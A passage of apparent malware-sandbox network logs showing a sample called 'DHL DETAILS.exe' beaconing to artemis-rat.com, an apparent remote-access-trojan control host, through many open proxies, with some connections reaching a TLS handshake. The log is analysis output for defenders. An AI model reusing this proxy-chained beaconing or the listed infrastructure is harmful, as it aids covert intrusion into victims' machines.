Mar 9, 2024 13:14:19.631613970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.932701111 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1532	192.168.2.5	54508	34.95.243.122	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.631688118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1533	192.168.2.5	54526	8.217.44.229	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.631689072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1534	192.168.2.5	49967	14.207.167.114	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.631840944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.723858118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833216906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.834108114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.660315037 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1535	192.168.2.5	54543	185.38.111.1	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.634630919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.955749035 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 0
Mar 9, 2024 13:14:20.280675888 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1536	192.168.2.5	49944	103.229.83.106	6789	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.635240078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1537	192.168.2.5	54670	172.67.181.9	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.637116909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.799031019 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1538	192.168.2.5	54832	43.152.192.217	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.638803005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1539	192.168.2.5	54674	104.19.109.209	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.639290094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.799468994 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1540	192.168.2.5	54833	43.152.192.217	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.639506102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1541	192.168.2.5	54835	43.152.192.217	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.640636921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1542	192.168.2.5	54838	43.152.192.217	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.641194105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1543	192.168.2.5	53146	118.172.47.97	51327	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.641885996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1544	192.168.2.5	54544	221.224.44.91	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.645004034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1545	192.168.2.5	54556	153.139.233.218	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.647789955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1546	192.168.2.5	54560	43.155.170.35	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.651355028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1547	192.168.2.5	54590	160.153.245.187	31745	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.662914038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.339292049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.364666939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.270770073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.022418022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.742494106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548165083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1548	192.168.2.5	54012	188.136.164.140	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.667536020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.228095055 CET	92	IN	HTTP/1.0 200 Connection established Proxy-agent: Kerio Control/9.4.2 patch 1 build 7290

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1549	192.168.2.5	54448	94.131.64.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.667671919 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1550	192.168.2.5	54733	104.16.226.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.670407057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.824709892 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1551	192.168.2.5	54702	54.67.125.45	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.672847033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.848092079 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1552	192.168.2.5	54677	51.81.186.179	51405	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.676743031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.177041054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868525028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1553	192.168.2.5	54637	3.127.62.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.684804916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.993597984 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:19.994123936 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 9a a6 09 ce ef 60 f0 a1 ba 2e aa c4 ea 36 76 47 69 71 cf 3b 9c 19 b7 52 2a f7 e6 5b dc 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR`.6vGiq;R[,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:20.298531055 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 a5 21 bf 3c c3 b0 e7 c5 93 82 8b d7 65 9a a2 aa b2 4f 21 b7 8c f5 2a 50 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9!<eO!PDOWNGRD0000H010Uartemis-rat.com0240309120940Z260309120940Z010Uartemis-rat.com0"0H0A?J:
Mar 9, 2024 13:14:20.527111053 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 fe 80 cb 63 6b 56 d4 35 5d 09 41 31 08 ae 48 f9 b6 f4 c6 63 68 dd 2e 15 37 a2 0a 16 38 64 e6 57 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 3c ea 23 d3 f0 65 66 41 00 b5 7f ec 60 db cb 15 f3 8d 7c a6 ac Data Ascii: %! ckV5]A1Hch.78dW(<#efA`\|+4#c
Mar 9, 2024 13:14:20.834781885 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 81 5c 8f 77 22 89 9d 15 8f bc f2 84 91 04 c2 93 72 4d f5 6f 9c ea 7a b0 92 68 93 56 1b cb 35 36 72 1c 57 b2 e5 2a b8 8f Data Ascii: (\w"rMozhV56rW*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1554	192.168.2.5	54642	114.156.77.107	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.697946072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1555	192.168.2.5	54587	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.701724052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1556	192.168.2.5	54567	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.701792955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1557	192.168.2.5	54740	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
